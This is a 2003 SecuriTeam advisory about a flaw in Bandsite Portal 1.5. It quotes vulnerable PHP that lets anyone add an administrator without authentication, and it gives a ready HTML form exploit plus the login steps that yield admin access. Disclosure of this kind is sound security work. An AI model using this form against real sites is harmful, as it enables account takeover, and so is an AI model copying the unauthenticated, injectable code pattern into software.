[UNIX] Vulnerability in Bandsite Allows Gaining Admin Access
From: SecuriTeam (support_at_securiteam.com)
Date: 09/16/03
- Previous message: SecuriTeam: "[UNIX] ChatZilla Remote Denial of Service Vulnerability (Long Buffer)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 16 Sep 2003 17:15:50 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Vulnerability in Bandsite Allows Gaining Admin Access
------------------------------------------------------------------------
SUMMARY
<http://membres.lycos.fr/fluxx/bandwebsite.php> Bandsite is "an online
portal system designed for Bands. Features: themes support, news posting,
audio sections, guestbook, tour guide, an admin section to manage overall
data and configurations, and more".
A vulnerability in the product allows remote attackers to insert a new
administrator account without requiring any special privileges.
DETAILS
Vulnerable systems:
* Bandsite Portal System version 1.5
Vulnerable code:
switch ($section) {
[...]
case admins:
if ($submit){
$query = "INSERT INTO admin (name,pass,level) VALUES
('$name','$pass','1')";
mysql_query($query) or die ("query failed");
echo"The admin has been added!<br><a
href=admin.php?section=admins>Back</a><br>";
As you can see by simply sending a request using the following HTML:
< form
action=http://[target]/bandwebsite/admin.php?&Login=1§ion=admins
method=post>
Name:< br>
< input type=text name='name' value='nmsh' size="20">< br>
Pass:< br>
< input type=text name='pass' value='nmsh' size="20">< br>
< input type=submit name='submit' value='send'>< br>
</form>
A new administrator named nmsh will be added with the password nmsh.
Now by going to the following URL: http://[target]/bandwebsite/login.php
and entering as the login name nmsh and as the password nmsh,
administrative privileges can be gained.
ADDITIONAL INFORMATION
The information has been provided by <mailto:nmsh_sa@yahoo.com>
Nasser.M.Sh.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] ChatZilla Remote Denial of Service Vulnerability (Long Buffer)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
